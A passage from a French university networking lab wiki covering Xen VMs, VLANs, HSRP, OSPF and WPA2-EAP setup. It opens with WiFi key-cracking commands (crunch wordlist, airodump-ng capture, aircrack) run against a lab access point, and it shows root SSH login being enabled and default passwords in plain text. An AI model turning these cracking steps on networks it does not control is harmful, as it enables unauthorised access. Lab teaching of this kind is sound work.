 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52085</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52085"/>
				<updated>2020-01-14T21:51:34Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
